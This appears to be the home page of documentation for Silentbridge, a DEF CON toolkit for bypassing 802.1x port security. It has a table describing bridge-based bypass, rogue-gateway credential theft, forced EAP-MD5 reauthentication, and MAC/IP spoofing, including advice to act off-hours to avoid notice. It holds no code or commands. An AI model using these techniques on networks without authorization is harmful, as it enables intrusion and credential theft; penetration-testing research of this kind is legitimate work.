Home
by Gabriel Ryan (@s0lst1c3) @ SpecterOps (gryan@specterops.io)
Silentbridge is a toolkit for quickly bypassing 802.1x port security first presented at DEF CON 26. It improves upon existing techniques for bypassing 802.1x-2004, and some new techniques for attacking both 802.1x-2004 and 802.1x-2010 via their authentication process.
You can check out the accompanying whitepaper at https://www.researchgate.net/publication/327402715_Bypassing_Port_Security_In_2018_-_Defeating_MACsec_and_8021x-2010.
| Technique | Description | Defeats 802.1x-2004 | Defeats 802.x-2010 / MACSEC |
|---|---|---|---|
| Bridged-based 802.1x Bypass | Classical 802.1x bypass using Linux bridges. Provides the ability to place a rogue device between a supplicant and authentication server without being detected, and to allow traffic to flow through the rogue device (where it can be sniffed). Network interactivity is provided using Source NAT (SNAT) at Layers 2 and 3. | Yes | No |
| Rogue Gateway Attack | Steal EAP credentials by diverting the supplicant's traffic to a rogue authenticator controlled by the attacker, either purely through software or through the use of mechanical AB splitters. Since this technique is an attack against the authentication mechanism used to provide access to the network's 802.1x capabilities, rather than against 802.1x itself, it is unaffected by the mitigations introduced by 802.1x-2010 when mechanical Ethernet splitters are used. | Yes | Yes (when mechanical switching is used by rogue device and weak EAP methods are used by the supplicant) |
| Active Auth Analyzer and EAP Forced Reauthentication Attack | Forces the supplicant to reauthenticate by sending forged EAPOL-Start frames to the authenticator. The resulting authentication process is analyzed to determine the EAP method in use. If EAP-MD5 is used, the identity and hash are automatically captured during this process.Classical attack against EAP-MD5 with a new twist. | Yes | No |
| Passive Auth Analyzer | Use passive tap to analyze the EAP authentication process and determine the EAP method in use. If EAP-MD5 is used, the identity and hash are automatically captured during this process. | Yes | No |
| Bait n Switch Attack | Follow-up to the Rogue Gateway and EAP-MD5 Forced Reauthentication attacks. Disconnects the supplicant from the network and replaces it with the attacker's device. The attacker spoofs the supplicant's MAC and IP addresses and uses a stolen set of credentials to authenticate directly with the switch. This attack works best when performed during off-hours when a temporary disruption in service is likely to go unnoticed. | Yes | Yes (when mechanical switching is used by rogue device and weak EAP methods are used by the supplicant) |
To get started with silentbridge, check out Software Setup and Hardware Setup for software and hardware installation instructions.
This document contains two sets of instructions for configuring a device to use silentbridge. The first set of instructions is for defeating 802.1x-2004, which should cover the vast majority of pentesting scenarios. This first set of instructions is intended to allow users to get up and running quickly with minimal effort. The second set of instructions is for setting up a device that can use silentbridge to bypass 802.1x-2010. This instruction set intended for users who care comfortable with assembling electronics equipment.
Once you have silentbridge up and running, check out the following sections for usage instructions: